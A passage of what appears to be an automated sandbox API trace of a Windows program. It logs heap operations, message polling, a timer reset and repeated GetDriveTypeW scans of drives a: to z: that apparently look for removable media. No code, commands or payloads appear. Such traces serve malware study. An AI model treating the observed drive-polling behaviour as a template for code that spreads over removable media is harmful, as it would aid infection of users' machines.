lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.171] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.171] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0218.171] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.171] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.171] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.172] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.172] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.172] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.172] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.172] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.173] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.173] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.173] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.173] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.173] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.174] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.174] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.174] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.174] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.175] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.175] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.175] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.175] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.175] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.176] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.176] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.176] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.177] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.177] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.177] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0218.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0218.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0218.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0218.179] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0218.179] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.179] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.179] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.179] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0218.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.180] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.180] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.180] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.180] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.181] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.181] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.181] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.181] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.181] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.181] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.182] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.182] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.182] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.182] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.183] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.183] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.183] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.183] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.183] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.183] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.184] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.184] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.184] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.184] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.185] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.185] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.185] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.185] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0218.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0218.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0218.187] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0218.187] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.187] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.187] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.187] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.187] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.187] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.188] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.188] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.188] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.188] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.188] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.189] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.189] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.189] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.189] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.190] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.190] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.190] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.190] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.190] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.191] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.191] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.191] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.191] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.191] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.192] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.192] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.192] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.192] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.192] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.193] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.193] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.193] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.194] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.194] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.194] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.194] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.194] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.194] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0218.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0218.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0218.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.196] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.196] 